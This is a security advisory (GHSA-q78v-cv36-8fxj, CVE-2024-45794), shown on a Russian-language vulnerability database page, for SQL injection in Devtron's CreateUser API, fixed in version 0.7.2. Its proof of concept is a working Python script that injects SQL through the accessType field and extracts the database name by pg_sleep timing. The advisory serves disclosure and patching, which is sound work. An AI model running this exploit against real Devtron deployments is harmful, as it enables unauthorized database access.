GHSA-q78v-cv36-8fxj

Опубликовано: 07 нояб. 2024

Источник: github

Github: Прошло ревью

CVSS4: 8.7

CVSS3: 8.3

Описание

Devtron has SQL Injection in CreateUser API

Summary

An authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user).

Details

The API is CreateUser (/orchestrator/user).

The function to read user input is: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104

The userInfo (line 104) parameter can be controlled by users.

The SQL injection can happen in the code: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038

The query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query.

The user should be authenticated but only needs minimum permissions:

PoC

Demonstrate a blind SQL injection to retrieve the database name:

import requests import time import string import argparse def blind(ip, token, query): url = f"http://{ip}/orchestrator/user" headers = {"token": token} entity = "chart-group" payload = f"'; {query} --" data = {"id": 111, "email_id": "abcd123@126.com", "superAdmin": False, "roleFilters":[{"team":"", "environment":"", "action": "", "entity": entity, "accessType": payload}]} #"EntityName": "test", "AccessType": "test", "Cluster": "",\"NameSpace": "devtroncd", "Group": "", "Kind": "", "Resource": "", "Workflow": "" start = time.time() res = requests.post(url, headers=headers, json = data) end = time.time() #print(res.content) if(end - start > 1): return True return False def main(ip, token): chs = string.printable result = "" is_end = False i = 1 while(not is_end): is_end = True for ch in chs: if(blind(ip, token, f"select case when substring(datname,{i},1)='{ch}' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;")): print(ch) result += ch is_end = False break i += 1 print(result) if __name__ == "__main__": argparser = argparse.ArgumentParser() argparser.add_argument("--ip", "-i", type=str, help="Target IP") argparser.add_argument("--token", "-t", type=str, help="API TOKEN") args = argparser.parse_args() main(args.ip, args.token)

The debugging breakpoint indicated that the malicious SQL query was executed:

We can see that we can get the database name:

Impact

SQL injection vulnerability. Our tests indicate that the latest version is affected.

The reporters are Yuan Luo, Shuai Xiong from Tencent YunDing Security Lab.

Ссылки

Пакеты

Наименование

github.com/devtron-labs/devtron

Затронутые версииВерсия исправления

< 0.7.2

0.7.2

EPSS

Процентиль: 42%

0.00197

Низкий

8.7 High

CVSS4

8.3 High

CVSS3

CVE ID

CVE-2024-45794

Дефекты

CWE-89

Связанные уязвимости

CVE-2024-45794

CVSS3: 8.3

nvd

около 1 года назад

devtron is an open source tool integration platform for Kubernetes. In affected versions an authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user). This issue has been addressed in version 0.7.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.

SUSE-SU-2024:4042-1

suse-cvrf

около 1 года назад

Security update for govulncheck-vulndb

EPSS

Процентиль: 42%

0.00197

Низкий

8.7 High

CVSS4

8.3 High

CVSS3

CVE ID

CVE-2024-45794

Дефекты

CWE-89